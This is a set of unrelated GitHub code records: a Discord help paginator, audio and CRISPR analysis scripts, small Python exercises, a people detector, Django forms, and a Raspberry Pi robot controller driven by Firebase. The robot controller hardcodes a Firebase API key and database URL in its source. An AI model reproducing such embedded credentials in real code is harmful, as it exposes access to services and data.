1:\n try:\n reaction, user = await bot.wait_for('reaction_add', timeout=90, check=check) # checks message reactions\n except asyncio.TimeoutError: # session has timed out\n try:\n await help_embed.clear_reactions()\n except discord.errors.Forbidden:\n pass\n break\n else:\n try:\n await help_embed.remove_reaction(str(reaction.emoji), ctx.author) # remove the reaction\n except discord.errors.Forbidden:\n pass\n\n if str(reaction.emoji) == '⏭': # go to the last the page\n page = len(cogs) - 1\n embed = await self.bot_help_paginator(page, cogs)\n await help_embed.edit(embed=embed)\n elif str(reaction.emoji) == '⏮': # go to the first page\n page = -1\n embed = await self.bot_help_paginator(page, cogs)\n await ctx.send(len(embed))\n\n await help_embed.edit(embed=embed)\n\n elif str(reaction.emoji) == '◀': # go to the previous page\n page -= 1\n if page == -2: # check whether to go to the final page\n page = len(cogs) - 1\n embed = await self.bot_help_paginator(page, cogs)\n await help_embed.edit(embed=embed)\n elif str(reaction.emoji) == '▶': # go to the next page\n page += 1\n if page == len(cogs): # check whether to go to the first page\n page = -1\n embed = await self.bot_help_paginator(page, cogs)\n await help_embed.edit(embed=embed)\n elif str(reaction.emoji) == '⏹': # delete the message and break from the wait_for\n await help_embed.delete()\n break\n\n async def send_command_help(self, command):\n await self.context.send(\"```\" + command.help + \"```\")\n\n async def bot_help_paginator(self, page: int, cogs) -> discord.Embed:\n ctx = self.context\n bot = ctx.bot\n\n if page == -1:\n embed = discord.Embed(\n title=\"Goldbot | Help\",\n description=\"Goldbot is a multi-purpose bot, written in Python by\\n`Goldbar#5656`\\n\\nFor more information visit:\\n[GitHub Page](https://github.com/Monroeshindelar/Goldbot-py)\",\n color=discord.Color.green()\n )\n\n embed.add_field(name=\"Controls\", value=':track_previous: Goes to the first page\\n'\n ':arrow_backward: Goes to the previous page\\n'\n ':stop_button: Deletes and closes this message\\n'\n ':arrow_forward: Goes to the next page\\n'\n ':track_next: Goes to the last page')\n else:\n cog = bot.get_cog(cogs[page])\n embed = discord.Embed(\n title=\"Goldbot | \" + cog.qualified_name,\n description=cog.description,\n color=discord.Color.green()\n )\n\n for c in cog.walk_commands():\n try:\n if await c.can_run(ctx) and not c.hidden:\n signature = self.get_command_signature(c)\n description = self.get_command_description(c)\n if c.parent:\n embed.add_field(name=f'**╚╡**{signature}', value=description)\n else:\n embed.add_field(name=signature, value=description, inline=False)\n except commands.CommandError:\n pass\n\n embed.set_thumbnail(url=bot.user.avatar_url)\n embed.set_footer(text=\"Page \" + str(page + 2) + \" of \" + str(len(cogs) + 1))\n\n return embed\n\n async def bot_help_paginator_reactor(self, message):\n reactions = (\n '\\N{BLACK LEFT-POINTING DOUBLE TRIANGLE WITH VERTICAL BAR}',\n '\\N{BLACK LEFT-POINTING TRIANGLE}',\n '\\N{BLACK SQUARE FOR STOP}',\n '\\N{BLACK RIGHT-POINTING TRIANGLE}',\n '\\N{BLACK RIGHT-POINTING DOUBLE TRIANGLE WITH VERTICAL BAR}'\n )\n for reaction in reactions:\n await message.add_reaction(reaction)\n\n def get_command_description(self, command) -> str:\n \"\"\"Method to return a commands short doc/brief\"\"\"\n if not command.short_doc: # check if it has any brief\n return 'There is no documentation for this command currently'\n else:\n return command.short_doc.format(prefix=self.clean_prefix)","repo_name":"Monroeshindelar/Goldbot-py","sub_path":"cogs/helpcommand.py","file_name":"helpcommand.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32966871631","text":"'''\nReplicate the tensorflow repo smoke test and confirm that the feature extractor\nworks as expected\n'''\nimport numpy as np\nimport torch\n\nfrom torchvggish.model import vggish\nfrom torchvggish.input_process import waveform_to_input\n\n\ndef gen_test_input():\n # Generate a 1 kHz sine wave at 44.1 kHz (we use a high sampling rate\n # to test resampling to 16 kHz during feature extraction).\n num_secs = 3\n freq = 1000\n sample_rate = 44100\n t = np.linspace(0, num_secs, int(num_secs * sample_rate))\n x = np.sin(2 * np.pi * freq * t)\n expected_stats = {\n 'embedding_mean': 0.131,\n 'embedding_std': 0.238,\n 'post_pca_mean': 123.0,\n 'post_pca_std': 75.0\n }\n return x, sample_rate, expected_stats\n\n\n@torch.no_grad()\ndef test_embeddings():\n model = vggish(with_classifier=False, pretrained=True)\n model.cuda()\n\n x, sample_rate, expected_stats = gen_test_input()\n x = torch.from_numpy(x).reshape(1, -1).float() # [C, L]\n # note that default torch processing differs a little bit from tf processing\n # to pass the original smoke test use the tf processing\n x = waveform_to_input(x, sample_rate, method='tf')\n x = x.cuda()\n\n embeddings = model(x)\n embeddings = embeddings.cpu().numpy()\n\n mean, std = np.mean(embeddings), np.std(embeddings)\n print('expected mean {} vs actual mean {}'.format(\n expected_stats['embedding_mean'], mean)\n )\n print('expected std {} vs actual std {}'.format(\n expected_stats['embedding_std'], std)\n )\n\n\nif __name__ == '__main__':\n test_embeddings()\n","repo_name":"w-hc/vggish","sub_path":"tests/smoke_test.py","file_name":"smoke_test.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"38833105275","text":"import math\r\nimport pandas as pd\r\nfrom scipy import stats\r\n\r\n\r\ndef spearman_ds(ds, actual_col, pred_col, p_value=False, nan_policy='omit'):\r\n '''\r\n Calculate Spearman correlation coefficient between actual and predicted efficiencies.\r\n By default, omits NaN values and outputs only the coefficient without the corresponding p-value.\r\n\r\n :parameter ds: dataset to analyse.\r\n :parameter actual_col: # position of column with actual efficiencies e.g. 2nd column -> 2.\r\n :parameter pred_col: # position of column with each model's predictions.\r\n :parameter p_value: If True, calculate the two-sided p-value for a hypothesis test whose null hypothesis is that two sets of data are uncorrelated.\r\n :parameter nan_policy: Defines how to handle when input contains nan. The following options are available (default is 'omit'):\r\n 'propagate': returns nan, 'raise': throws an error, 'omit': performs the calculations ignoring nan values.\r\n :return: Spearman correlation coefficient (or a tuple of Spearman correlation coefficient and corresponding p-value).\r\n '''\r\n\r\n Spearman, pval = stats.spearmanr(\r\n ds.iloc[:, actual_col - 1], ds.iloc[:, pred_col - 1], nan_policy=nan_policy)\r\n if p_value == False:\r\n return Spearman\r\n else:\r\n return Spearman, pval\r\n\r\n\r\ndef ndcg_at_k(ds, k, actual_col, pred_col, bins=False, reverse=False, multiple=False):\r\n \"\"\"\r\n Calculate nDCG@k score using logarithmic discount given a dataset with actual and predicted efficiencies.\r\n The relevance value of each gRNA is its efficacy score.\r\n\r\n :parameter ds: dataset to analyse.\r\n :parameter k: highest value to calculate nDCG i.e. only consider the highest k scores in the ranking.\r\n :parameter actual_col: # position of column with actual efficiencies e.g. 2nd column -> 2.\r\n :parameter pred_col: # position of column with each model's predictions.\r\n :parameter bins (default=False): If True, group actual efficiencies into 5 equal width bins to have a discrete relevance value.\r\n By default, use actual efficiency as the relevance value.\r\n :parameter reverse (default=False): If True, calculate nDCG for reverse ordering to be used as a baseline.\r\n :parameter multiple (default=False): If True, calculate and store nDCG together with samples' indices for plotting.\r\n :return: nDCG@k score (or a list of scores and indices if parameter multiple is True).\r\n \"\"\"\r\n\r\n # Discrete relevance value\r\n\r\n if bins == True:\r\n quantile_list = [0.0, 0.20, 0.40, 0.60, 0.80, 1.0]\r\n bins = ds.iloc[:, actual_col-1].quantile(quantile_list)\r\n labels = [0, 1, 2, 3, 4]\r\n ds['binned'] = pd.cut(ds.iloc[:, actual_col-1],\r\n bins, labels=labels, include_lowest=True)\r\n\r\n # Reverse ordering (worst case)\r\n if reverse == True:\r\n ds_sort = ds.sort_values(by=ds.columns[actual_col-1])\r\n y_pred = ds_sort['binned'].values\r\n\r\n # Ordering based on each model's predictions\r\n else:\r\n ds_sort = ds.sort_values(\r\n by=ds.columns[pred_col-1], ascending=False)\r\n y_pred = ds_sort['binned'].values\r\n\r\n # Actual relevance value\r\n\r\n else:\r\n\r\n # Reverse ordering (worst case)\r\n if reverse == True:\r\n ds_sort = ds.sort_values(by=ds.columns[actual_col-1])\r\n y_pred = ds_sort.iloc[:, actual_col-1].values\r\n\r\n # Ordering based on each model's predictions\r\n else:\r\n ds_sort = ds.sort_values(\r\n by=ds.columns[pred_col-1], ascending=False)\r\n y_pred = ds_sort.iloc[:, actual_col-1].values\r\n\r\n # Ideal ordering\r\n Y_test = sorted(y_pred, reverse=True)\r\n\r\n # Calculate nDCG@k\r\n\r\n thr = []\r\n score = []\r\n\r\n a = b = 0\r\n for i in range(0, k):\r\n a += y_pred[i]/math.log2(i+2)\r\n b += Y_test[i] / math.log2(i + 2)\r\n thr.append(i)\r\n if not b:\r\n score.append(0)\r\n else:\r\n score.append(a/b)\r\n\r\n if multiple == True:\r\n return score, thr\r\n else:\r\n return score[-1]\r\n","repo_name":"VKonstantakos/CRISPR-Deep-Learning","sub_path":"Scripts/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":4163,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"22729038167","text":"import string\r\n\r\nimport datetime\r\nOctubre = datetime.date.today().strftime('%B')\r\n\r\nconjunto_A = set(Octubre)\r\n\r\nconjunto_B = set(string.ascii_lowercase[:10])\r\n\r\ninterseccion = conjunto_A.intersection(conjunto_B)\r\n\r\nprint(\"Conjunto A:\", conjunto_A)\r\nprint(\"Conjunto B:\", conjunto_B)\r\nprint(\"Intersección de A y B:\", interseccion)\r\n\r\n","repo_name":"MarcoBarrientos/Tarea.-Proyecto-Final---Matem-ticaDiscreta","sub_path":"segundo.py","file_name":"segundo.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3606979554","text":"num = int(input())\nss = set()\n\nfor _ in range(num):\n direction, car_number = input().split(', ')\n\n if direction == 'IN':\n ss.add(car_number)\n else:\n ss.remove(car_number)\n\n\nif len(ss) > 0:\n for car in ss:\n print(car)\n\nelse:\n print('Parking Lot is Empty')\n\n","repo_name":"Velin-Todorov/SoftUni","sub_path":"Sets and tuples/parking lot.py","file_name":"parking lot.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"330938906","text":"# Kai kurias bibliotekas importuoju priskirdamas kažkokiam kintamajam\n# tai darau tam, jog daryti \" from BIBLIOTEKA import * \" nėra gera praktika\nimport tkinter.tix as tkx\nfrom tkinter import font as tkfont\nimport utils.Constants as const\nfrom database.stores.HallStore import HallStore\nfrom database.stores.PurchaseStore import PurchaseStore\nfrom database.stores.SeatStore import SeatStore\nfrom database.stores.UserStore import UserStore\nfrom utils.Auth import Auth\nfrom windows.Home import Home\nfrom windows.Login import Login\n\n\n# Klasė Application paveldi informaciją iš klasės Tk\nclass Application(tkx.Tk):\n # Pagrindinis elementas programoje yra pasirinkta salė esanti duomenų bazeje\n # kadangi be jos nebus galimybės nuskaityti salės sėdimų vietų, vartotojo pirkimų ir kitų dalykų\n # Salės ID saugau kaip globalų kintamąjį, kuris bus prieinamas kitoms klasėms (frames)\n currentHallId = None\n\n # Konstruktorius\n def __init__(self, *args, **kwargs):\n # Tėvinės klasės konstruktorius\n tkx.Tk.__init__(self, *args, *kwargs)\n\n # Programoje naudojami font'ai\n self.welcome_msg_font = tkfont.Font(family='Helvetica', size=12, slant=\"italic\")\n self.secondaryFont = tkfont.Font(family='Helvetica', size=11, slant=\"italic\")\n\n # Pagrindinis langas sukuriamas kaip ScrolledWindow\n # tai suteikia galimybę elementams neįsitenkant lange uždėti langui Scrollbars\n sw = tkx.ScrolledWindow(self, scrollbar=tkx.AUTO)\n sw.pack(fill=tkx.BOTH, expand=1)\n self.minsize(const.MIN_WIDTH, const.MIN_HEIGHT)\n container = tkx.Frame(sw.window)\n\n # Sukuriamas vartotojo objektas aplikacijoje\n self._auth = Auth()\n\n # Nedarau paveldejimo is klases HallStore ir kitu, o kuriu nauja objekta Tai darau tam, jog duomenims is duomenu\n # bazes gauti yra imituojamas Repository pattern'as, kuriam reikalingas objektas\n # objektai sukuriami viena vieninteli nepakartojama karta\n self._hallStore = HallStore()\n self._seatStore = SeatStore()\n self._userStore = UserStore()\n self._purchaseStore = PurchaseStore()\n\n # Frames/langų dictionary\n self._frames = {}\n\n # Šiuo metu aplikacijoje esantis langas\n self._selected = None\n\n container.pack(side=\"top\", fill=\"both\", expand=True)\n\n self.container = container\n\n # Frames(Windows) objektu sukurimas\n # objektai sukuriami viena vieninteli nepakartojama karta\n self._frames[const.WINDOW_HOME] = Home(auth=self._auth, parent=container, controller=self,\n hallStore=self._hallStore,\n seatStore=self._seatStore, purchaseStore=self._purchaseStore)\n self._frames[const.WINDOW_LOGIN] = Login(auth=self._auth, parent=container, controller=self,\n userStore=self._userStore)\n\n # Pradinis aplikacijos langas\n self.switch_frame(const.WINDOW_HOME)\n\n def switch_frame(self, window_name):\n \"\"\"Destroys current frame and replaces it with a new one.\"\"\"\n\n # Jeigu jau egzistuoja bent vienas langas, jis, t.y. Frame, yra sunaikinamas\n if self._selected is not None:\n self._selected.pack_forget()\n self._selected.grid_forget()\n\n self._selected = self._frames[window_name]\n self._selected.refresh()\n self._selected.pack()\n\n # instance of an object check\n '''print(\"-------------------------\")\n for obj in gc.get_objects():\n if isinstance(obj, Home) or isinstance(obj, Login) or isinstance(obj, HallStore) or isinstance(obj,\n UserStore) or isinstance(\n obj, SeatStore) or isinstance(\n obj, Hall) or isinstance(\n obj, User) or isinstance(\n obj, Purchase):\n print(obj)'''\n\n\nif __name__ == '__main__':\n # Application objekto sukurimas\n app = Application()\n app.mainloop()\n","repo_name":"GdonatasG/tickets-tkinter-LD4","sub_path":"Application.py","file_name":"Application.py","file_ext":"py","file_size_in_byte":4159,"program_lang":"python","lang":"lt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24378148172","text":"\"\"\"\n CREATED BY: Benjamin Hamlin\n Chapter 2 Question 8\n \"Loop Detection\"\n PROMPT:\n Given a linked list which might contain a loop, implement and algorithm that\n returns the node at the beginning of the loop (if one exists)\n DATE: 12/9/2019\n\"\"\"\n\nimport unittest\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\n def dispose(self):\n del self\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def dispose(self):\n if self.head is not None:\n temp = self.head\n self.head = self.head.next\n temp.dispose()\n # self.dispose()\n\n# at this time I am unable to determine the time complexity without more studying\ndef p8(list):\n \"\"\"cur1 = list.head.next\n cur2 = list.head.next\n head = list.head\n while head is not cur1 and head is not cur2:\n while cur1 is not cur2:\n cur1 = cur1.next\n cur2 = cur2.next.next\n head = head.next\n cur1 = head.next\n cur2 = head.next\n #print(head.data)\n #print(cur1.data)\n #print(cur2.data)\n if head is cur1 or head is cur2:\n return head\n else:\n return None\n NOTE: INCORRECT\n Research found floyd's tortoise and hare algorithm\n implemented below\n \"\"\"\n t = list.head.next\n h = list.head.next.next\n while t is not h:\n t = t.next\n h = h.next.next\n\n mu = 0\n t = list.head\n while t is not h:\n t = t.next\n h = h.next\n mu += 1\n return t\n\n \"\"\"\n # rest of floyd's algorithm unnecessary\n lam = 1\n h = t.next\n while t is not h:\n h = h.next\n lam += 1\n \"\"\"\n\nclass TestP8(unittest.TestCase):\n def setUp(self):\n self.list = LinkedList()\n\n def tearDown(self):\n self.list.dispose()\n self.list = None\n\n def test_p8(self):\n self.list.head = Node('A')\n self.list.head.next = Node('B')\n C = Node('C')\n self.list.head.next.next = C\n C.next = Node('D')\n C.next.next = Node('E')\n C.next.next.next = C\n\n self.assertEqual(p8(self.list).data, C.data)\n","repo_name":"benhamlin314/CrackingCoding","sub_path":"python/ch2/p8.py","file_name":"p8.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29292081405","text":"# Source: Fluent Python, Luciano Ramalho, page 150\n\n\ndef tag(name: str, *content: tuple, cls: str = None, **attrs: dict) -> str:\n \"\"\"\n Creates HTML/XML tags.\n\n :param name: the name of the tag (without the brackets)\n :param content: the (text) content to wrap. If more than one\n positional argument is given, each content is wrapped as\n a tag with the tag name \"name\".\n :param cls: An optional \"class\" attribute. Defaults to None.\n :return: the representation of the tag as string with all attributes\n the attributes inside the start tag are sorted.\n\n >>> tag(\"br\")\n '
'\n >>> tag(\"p\", \"Hello\")\n '

Hello

'\n >>> tag(\"p\", \"hello\", id=33)\n '

hello

'\n >>> tag(\"p\", \"Hello\", \"World\")\n '

Hello

\\\\n

World

'\n >>> tag(\"img\", title=\"Sunset\", src=\"sunset.jpg\", cls=\"framed\")\n ''\n \"\"\"\n if cls is not None:\n attrs[\"class\"] = cls\n if attrs:\n attr_str = \"\".join(\n f' {attr}=\"{value}\"' for attr, value in sorted(attrs.items())\n )\n else:\n attr_str = \"\"\n if content:\n element = f\"<{name}{attr_str}>%s\"\n return \"\\n\".join(element % c for c in content)\n else:\n return f\"<{name}{attr_str} />\"\n","repo_name":"tomschr/python-course-public-cloud","sub_path":"topic-func/tag.py","file_name":"tag.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15497438541","text":"# Import Libraries\nfrom Robot import Motor, Kinematics, Trajectory, Measure # Custom libraries made for the system\nimport RPi.GPIO as GPIO # Importing raspberry pi libraries\nimport time # Other common libraries\nimport sys, termios, tty\nimport pyrebase # Firebase libraries\n\nGPIO.cleanup() # Resets all Raspberry Pi GPIO pin to zero or ground\n\n\n# The below function allows the system to interact with the user and take details of the item to be transferred and\n# utilizes the custom libraries to plan a path and execute it\ndef Deploy_Robot():\n # Firebase config allows the code to know where to upload the data\n config = {\n \"apiKey\": \"AIzaSyCZ-Wx5K-Q0F-jad2Q-LxjE2zstLjVslWk\",\n \"authDomain\": \"robot-control-c1e61\",\n \"databaseURL\": \"https://robot-control-c1e61-default-rtdb.firebaseio.com/Robot%20Control\",\n \"storageBucket\": \"robot-control-c1e61.appspot.com\"\n }\n firebase = pyrebase.initialize_app(config) # initializing the firebase variable\n\n # Function to get user input\n def getch():\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(sys.stdin.fileno())\n ch = sys.stdin.read(1)\n\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n return ch\n\n print('\\033c') # clear terminal\n\n GPIO.setmode(GPIO.BOARD) # initializing the Raspberry Pi GPIO pin nomenclature\n GPIO.setwarnings(False) # Disables unwanted warnings\n\n # initializing local variables\n interval = 0.01\n\n # initializing Motors (3 No.s)\n M1 = Motor(\"M1\", 11, 13, 33, 38, 40, 450, 0.038)\n M2 = Motor(\"M2\", 22, 24, 35, 8, 10, 695, 0.038)\n M3 = Motor(\"M3\", 29, 31, 37, 16, 18, 695, 0.038)\n\n # initializing motor params and functions to help run and retrieve data\n M1.Motor_setup()\n M2.Motor_setup()\n M3.Motor_setup()\n\n M1.edge_detect()\n M2.edge_detect()\n M3.edge_detect()\n\n M1.Motor_pwm()\n M2.Motor_pwm()\n M3.Motor_pwm()\n\n # Stops motors from rotating unnecessarily\n M1.STOP_pwm()\n M2.STOP_pwm()\n M3.STOP_pwm()\n\n beta = Kinematics(0.019, 0.052) # initializing robot kinematic params\n\n # Loop to continuously check for user input\n while True:\n beta.qr_scan() # printing function\n db = firebase.database() # initialize firebase database variable\n char = '\"Rack 1\"' # db.child(\"Rack\").get().val() # retrieving data from firebase\n\n # Checking if data matches\n if char == '\"Rack 1\"':\n beta_trajectory = Trajectory([0, 0], [0, 1], 0.05, 0.1) # Location details of Rack 1 along with other\n # robot param\n\n # custom library functions used for planning the path and trajectory\n beta_trajectory.elu_dist()\n beta_trajectory.planner()\n beta_trajectory.traj_print()\n\n beta_measure = Measure() # initializing variable for storing sensor data\n\n # resetting count to remove any garbage values\n M1.count_reset()\n M2.count_reset()\n M3.count_reset()\n\n start_time = round(time.time(), 2) # initializing params to track program time\n\n while True:\n\n t = round(time.time(), 2) - start_time # Calculating elapsed program time\n\n if t <= beta_trajectory.max_time + 0.5: # Checking elapsed robot run time\n\n # Custom library functions used for converting sensor values to real world values\n M1.Motor_run()\n M2.Motor_run()\n M3.Motor_run()\n\n # Code snippet that selects data produced by the trajectory planner and supplies to the robot drive\n # functions at a particular interval\n try:\n i = int(round(t / beta_trajectory.sample_time, 0)) # Indexing\n\n # Applying the retrieved values into the robot kinematic function\n beta.ikine(beta_trajectory.robot_vel[i][0], beta_trajectory.robot_vel[i][1],\n beta_trajectory.robot_vel[i][2])\n\n # Storing important data retrieved from the sensors onboard the robot\n beta_measure.time_data(beta_trajectory.tarr[i])\n beta_measure.robot_vel_in_data(beta_trajectory.robot_vel[i][0], beta_trajectory.robot_vel[i][1])\n beta_measure.encoder_data(M1.count, M2.count, M3.count)\n beta_measure.motor_vel_in_data(beta.w1, beta.w2, beta.w3)\n beta_measure.motor_vel_out_data(M1.vel, M2.vel, M3.vel)\n beta_measure.robot_vel_out_data(beta.Vx, beta.Vy)\n except IndexError: # Added exception to rule out any unexpected errors\n i = 0\n\n [pwm1, sign1, pwm2, sign2, pwm3, sign3] = beta.wheel_pwm() # pwm publisher\n\n # running motors according to the values received from the pwm publisher\n M1.pwm(pwm1, sign1)\n M2.pwm(pwm2, sign2)\n M3.pwm(pwm3, sign3)\n\n # Velocity calculation\n M1.Vel(t, interval)\n M2.Vel(t, interval)\n M3.Vel(t, interval)\n\n # Localization or forward kinematics\n beta.fkine(M1.vel, M2.vel, M3.vel)\n\n # custom printing functions for debugging\n M1.data_print(t, 1)\n M2.data_print(t, 2)\n M3.data_print(t, 3)\n beta.kine_print()\n beta_trajectory.traj_print()\n time.sleep(interval)\n\n else: # once the execution of the path is completed the robot stops\n M1.STOP_pwm()\n M2.STOP_pwm()\n M3.STOP_pwm()\n\n # Data received is represented as plots for better visualization\n beta.wait()\n beta_measure.data_logger()\n beta_measure.save_plots()\n beta.end_print()\n\n # User confirmation for exiting the routine\n while True:\n char = getch()\n if char == \"p\":\n beta.robot_stop()\n GPIO.cleanup()\n exit(0)\n\n\n# The below function allows the user to manually control the robot using a custom-made joystick app\ndef Teleop():\n config = {\n \"apiKey\": \"AIzaSyCZ-Wx5K-Q0F-jad2Q-LxjE2zstLjVslWk\",\n \"authDomain\": \"robot-control-c1e61\",\n \"databaseURL\": \"https://robot-control-c1e61-default-rtdb.firebaseio.com/Robot%20Control\",\n \"storageBucket\": \"robot-control-c1e61.appspot.com\"\n }\n\n firebase = pyrebase.initialize_app(config)\n\n GPIO.setmode(GPIO.BOARD)\n GPIO.setwarnings(False)\n\n M1 = Motor(\"M1\", 11, 13, 33, 38, 40, 860, 0.038) # IN1 IN2 PWM ENA ENB CPR DIA\n M2 = Motor(\"M2\", 22, 24, 35, 8, 10, 860, 0.038)\n M3 = Motor(\"M3\", 29, 31, 37, 16, 18, 850, 0.038)\n\n beta = Kinematics(0.038, 0.080)\n beta.robot_stop()\n\n M1.Motor_setup()\n M2.Motor_setup()\n M3.Motor_setup()\n\n M1.edge_detect()\n M2.edge_detect()\n M3.edge_detect()\n\n M1.Motor_pwm()\n M2.Motor_pwm()\n M3.Motor_pwm()\n\n M1.STOP_pwm()\n M2.STOP_pwm()\n M3.STOP_pwm()\n\n button_delay = 0.001\n\n print('Teleop Started') # Code start conformation\n\n while True:\n db = firebase.database()\n char = db.child(\"Direction\").get().val()\n print(\"%s\" % char)\n\n # Code to check the user input and select code to run the robot in the user-selected direction\n if char == 'p':\n print(\"Stop!\")\n M1.STOP_pwm()\n M2.STOP_pwm()\n M3.STOP_pwm()\n exit(0)\n\n if char == '\"a\"':\n print(\"Left pressed\")\n beta.ikine(-0.25, 0, 0)\n [pwm1, sign1, pwm2, sign2, pwm3, sign3] = beta.wheel_pwm()\n\n M1.pwm(pwm1, sign1)\n M2.pwm(pwm2, sign2)\n M3.pwm(pwm3, sign3)\n time.sleep(button_delay)\n\n elif char == '\"d\"':\n print(\"Right pressed\")\n beta.ikine(0.25, 0, 0)\n [pwm1, sign1, pwm2, sign2, pwm3, sign3] = beta.wheel_pwm()\n\n M1.pwm(pwm1, sign1)\n M2.pwm(pwm2, sign2)\n M3.pwm(pwm3, sign3)\n time.sleep(button_delay)\n\n elif char == '\"e\"':\n print(\"Right pressed\")\n beta.ikine(0, 0, -1.2)\n [pwm1, sign1, pwm2, sign2, pwm3, sign3] = beta.wheel_pwm()\n\n M1.pwm(pwm1, sign1)\n M2.pwm(pwm2, sign2)\n M3.pwm(pwm3, sign3)\n time.sleep(button_delay)\n\n elif char == '\"q\"':\n print(\"clockwise rotation\")\n beta.ikine(0, 0, 1.2)\n [pwm1, sign1, pwm2, sign2, pwm3, sign3] = beta.wheel_pwm()\n\n M1.pwm(pwm1, sign1)\n M2.pwm(pwm2, sign2)\n M3.pwm(pwm3, sign3)\n time.sleep(button_delay)\n\n elif char == '\"w\"':\n print(\"Forward\")\n beta.ikine(0, 0.25, 0)\n [pwm1, sign1, pwm2, sign2, pwm3, sign3] = beta.wheel_pwm()\n\n M1.pwm(pwm1, sign1)\n M2.pwm(pwm2, sign2)\n M3.pwm(pwm3, sign3)\n time.sleep(button_delay)\n\n elif char == '\"s\"':\n print(\"Down pressed\")\n beta.ikine(0, -0.25, 0)\n [pwm1, sign1, pwm2, sign2, pwm3, sign3] = beta.wheel_pwm()\n\n M1.pwm(pwm1, sign1)\n M2.pwm(pwm2, sign2)\n M3.pwm(pwm3, sign3)\n time.sleep(button_delay)\n\n elif char == '\"f\"':\n print(\"Stop pressed\")\n M1.STOP_pwm()\n M2.STOP_pwm()\n M3.STOP_pwm()\n time.sleep(button_delay)\n\n# End of main functions\n\n# Main function selector\n# config = {\n# \"apiKey\": \"AIzaSyCZ-Wx5K-Q0F-jad2Q-LxjE2zstLjVslWk\",\n# \"authDomain\": \"robot-control-c1e61\",\n# \"databaseURL\": \"https://robot-control-c1e61-default-rtdb.firebaseio.com/Robot%20Control\",\n# \"storageBucket\": \"robot-control-c1e61.appspot.com\"\n# }\n#\n# firebase = pyrebase.initialize_app(config)\n# print('Firebase Started')\n# while True:\n#\n# db = firebase.database()\n# DR = db.child(\"Deploy Robots\").get().val()\n# MC = db.child(\"Manual Controller\").get().val()\n#\n# # below code selects and runs main function that the user has selected\n# if DR == '\"Enabled\"':\n# print('Deploy Robots Enabled')\nDeploy_Robot()\n# elif MC == '\"Enabled\"':\n# print('Manual Controller Enabled ')\n# Teleop()\n","repo_name":"Collaborative-AMRs/Software-Stack","sub_path":"Beta.py","file_name":"Beta.py","file_ext":"py","file_size_in_byte":10778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40581970991","text":"# import the necessary packages\nimport numpy as np\nimport cv2\nimport pyrealsense2 as rs\n\n\nW = 640\nH = 480\nFPS = 30\n\n# Configure depth and color streams\npipeline = rs.pipeline()\nconfig = rs.config()\nconfig.enable_stream(rs.stream.color, W, H, rs.format.bgr8, FPS)\n\nprint(\"[INFO] Starting streaming...\")\npipeline.start(config)\nprint(\"[INFO] Camera ready.\")\n\n# initialize the HOG descriptor/person detector\nhog = cv2.HOGDescriptor()\nhog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())\nprint(\"[INFO] Detector ready.\")\n\n# cv2.startWindowThread()\n\n# open webcam video stream\n# cap = cv2.VideoCapture(0)\n\n# the output will be written to output.avi\nout = cv2.VideoWriter(\n 'output/output.avi',\n cv2.VideoWriter_fourcc(*'MJPG'),\n 15.,\n (640,480))\n\nwhile(True):\n # Capture frame-by-frame\n frames = pipeline.wait_for_frames()\n color_frame = frames.get_color_frame()\n frame = np.asanyarray(color_frame.get_data())\n\n # resizing for faster detection\n frame = cv2.resize(frame, (W, H))\n # using a greyscale picture, also for faster detection\n gray = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)\n\n # detect people in the image\n # returns the bounding boxes for the detected objects\n boxes, weights = hog.detectMultiScale(frame, winStride=(4,4), scale=1.15, useMeanshiftGrouping=False)\n\n boxes = np.array([[x, y, x + w, y + h] for (x, y, w, h) in boxes])\n\n for (xA, yA, xB, yB) in boxes:\n # display the detected boxes in the colour picture\n cv2.rectangle(frame, (xA, yA), (xB, yB),\n (0, 255, 0), 2)\n \n # Write the output video \n out.write(frame.astype('uint8'))\n # Display the resulting frame\n cv2.imshow('frame',frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n print(\"[INFO] FPS: \", rs.frame_metadata_value.actual_fps.value)\n\n\n# When everything done, release the capture\n# cap.release()\n# and release the output\nout.release()\n# finally, close the window\ncv2.destroyAllWindows()\ncv2.waitKey(1)","repo_name":"Vojtech1025/RS_Physio","sub_path":"detection/bodyparts.py","file_name":"bodyparts.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44333348210","text":"from django import forms\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.forms import ModelForm\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom .models import DreamReal, Author, Book\n\n\nclass LoginForm(forms.Form):\n user = forms.CharField(max_length=30)\n password = forms.CharField(widget=forms.PasswordInput())\n\n def clean_message(self):\n username = self.cleaned_data.get(\"username\")\n dbuser = DreamReal.objects.filter(name=username)\n\n if not dbuser:\n raise forms.ValidationError(\"User Does not Exist\")\n return username\n\n\nclass ProfileForm(forms.Form):\n name = forms.CharField(max_length=100)\n picture = forms.ImageField()\n\n\nclass ContactForm(forms.Form):\n contact_name = forms.CharField(required=True)\n contact_email = forms.EmailField(required=True)\n content = 